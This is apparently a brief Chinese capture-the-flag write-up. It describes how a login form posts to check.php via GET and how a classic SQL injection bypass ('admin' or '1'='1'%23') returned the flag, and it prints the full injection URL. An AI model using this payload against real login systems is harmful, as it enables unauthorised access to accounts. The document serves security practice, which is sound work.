最后更新于3年前
F12发现是向check.php使用GET提交username和password
尝试万能密码,访问check.php?username=admin' or '1'='1'%23&password=123,给了flag
check.php?username=admin' or '1'='1'%23&password=123